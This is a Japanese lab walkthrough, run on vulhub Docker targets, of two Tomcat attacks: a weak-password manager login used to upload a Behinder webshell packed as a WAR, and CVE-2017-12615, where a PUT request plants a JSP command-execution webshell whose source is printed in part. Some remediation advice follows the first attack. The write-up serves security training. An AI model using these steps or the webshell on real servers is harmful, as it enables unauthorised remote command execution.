環境:centOS7
tomcat
docker
必要なツール:java 環境、冰蝎
弱いパスワードの利用とアップロード#
ファイルの場所:
/root/CVE/vulhub-master/tomcat/tomcat8
仮想マシンで docker を実行し、コマンド
docker-compose up -d
仮想マシンの IP アドレスを確認し、ローカルで開く。tomcat のデフォルトポート 8080
右上に manager App があるのが見える
弱いパスワードを使用してログイン:ユーザー名 tomcat、パスワード tomcat
ウェブページに入ると、アップロードする場所があることがわかる
次に冰蝎を開いて shell をアップロードする準備をする
default_aes を選択し、サーバーを生成するをクリック
その後、自動的にフォルダがポップアップし、必要な shell ファイルが含まれている
cmd を開き、その中の一つ.jsp を選択
コマンドを入力
jar cvf shell.war .\shell.jsp
shell ファイルを war パッケージにパッケージ化し、アップロードの準備をする
成功のメッセージが表示され、アドレスを開いて確認する
http://192.168.1.4:8080/shell/shell.jsp
成功を確認し、冰蝎を開いて新規作成をクリックし、先ほどのアドレスを入力
これで shell を取得した
修正案
1、弱いパスワードを変更する(表面的な対策)
2、システム上で低権限で Tomcat アプリケーションを実行する。専用の
Tomcat サービスユーザーを作成し、そのユーザーには最小限の権限のみを付与する(例:リモートログインを許可しない)。
3、ローカルおよび証明書ベースの認証を強化し、アカウントロック機構を導入する(集中認証の場合、ディレクトリサービスも適切に設定する)。
CATALINA_HOME/conf/web.xml ファイルでロック機構とタイムアウト制限を設定する。
4、manager-gui/manager-status/manager-script などのディレクトリページに対して最小限の権限アクセス制限を設定する。
CVE-2017-12615—— リモートコード実行#
Manager App をクリックしてみると、ブロックされた
今、BrupSuite を開く
提供された POC を準備する
<%@ page language="java" import="java.util.,java.io." pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
インターセプトされたものを Repeater に送信
GET を PUT /1.jsp/ に変更し、下に以前準備した POC を追加
ステータスコードは 201 で、アップロードが成功したことを示す。アドレスを開く
コマンドを入力してみる
http://192.168.1.4:8080/1.jsp?pwd=023&cmd=id
同様に、ここでの POC は冰蝎の shell に置き換えることができ、より良く shell を取得することができる。